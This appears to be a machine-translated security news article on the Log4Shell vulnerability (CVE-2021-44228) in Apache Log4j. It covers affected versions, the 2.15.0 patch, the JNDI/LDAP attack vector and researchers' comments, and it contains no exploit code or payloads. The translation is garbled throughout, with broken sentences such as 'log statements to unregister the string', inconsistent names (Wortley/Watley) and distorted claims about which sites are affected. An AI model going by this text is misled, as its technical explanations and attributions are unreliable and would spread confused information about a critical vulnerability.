Adam Bannister December 10, 2021 14:56 UTC
Update time: December 10, 2021 14:59 UTC
Various enterprise software affected by CVSS level 10 errors
The maintainers of the popular Java logging library Apache Log4j have issued an urgent patch for a critical vulnerability that may lead to remote code execution (RCE) in many applications.
The relative ease of exploitation, the ability of the attacker to control the target server, and the ubiquity of Log4j lead to serious situations.
The vulnerability (CVE-2021-44228) is called “Log4Shell” and is provided by Alibaba’s Zhaojun Chen The maximum CVSS score is 10.
Downstream impact
Versions 2.0-beta9 to 2.14.1 (including 2.14.1) are all affected by this defect.
The maintainer of Apache Log4j released one today new version – 2.15.0 – Within a day of the PoC (PoC) surfaced Twitter and GitHub, And mitigation measures for those who cannot update immediately.
“Now it needs to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, equipment, etc.,” Tweet British security expert Kevin Beaumont.
You might also like Grafana urges web developers to update based on path traversal error disclosure
According to a newly released report, potentially vulnerable applications include any application that uses Apache Struts and iCloud, Steam, Twitter, Cloudflare, Amazon and Tesla websites. GitHub repository.
“Although this appears as a Minecraft issue (laughs), it will affect a wide range of enterprise software for some time,” Beaumont added.
According to Free Wortley and Chris Thompson, the CEO and developers of the open source data security platform LunaSec, many open source projects have solved this problem in their own applications.
Attack vector
The two have recorded various exploits and other key information about the vulnerability Blog post It was released yesterday (December 9th), and updates are still being released as new details emerge.
They say that if the server is running a vulnerable version of Log4j and has an endpoint protocol that allows an attacker to send an exploit string and log statements to unregister the string from the request, they are vulnerable.
According to Apache Log4j2 version 2.14.1 and lower versions, it cannot resist (Lightweight Directory Access Protocol) (LDAP) and other JNDI-related endpoints controlled by attackers. CVE description.
“When message search and replacement is enabled, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from the LDAP server,” it said.
By default, this behavior is no longer enabled in Log4j 2.15.0, and “users are strongly recommended not to enable it”, the maintainer suggests.
Read more latest open source security news
According to another source, Java Development Kit (JDK) versions higher than 6u211, 7u201, 8u191 and 11.0.1 are not affected by the LDAP attack vector Blog post Quoted by Watley and Thompson.
However, there are other attack vectors that may cause RCE, including attack targets and classes that exist on the Apache Tomcat server, such as Recorded by Veracode In 2019.
Since such Java vulnerabilities are so common, security researchers have created tools such as marshal Projects, to use them, please pay attention to Watley and Thompson.
The two suggested that security teams protect sensitive data by deploying tokenization.
Beaumont pointed out that the first repair version 2.15.0-rc1 was bypassed, so users should apply for log4j-2.15.0-rc2. He also observed: “Your JDK configuration may prevent you from being exploited. Some distributions provide security configurations by default.”
Respected Launched the OWASP ModSecurity core rule set sandbox to help security researchers test new CVEs
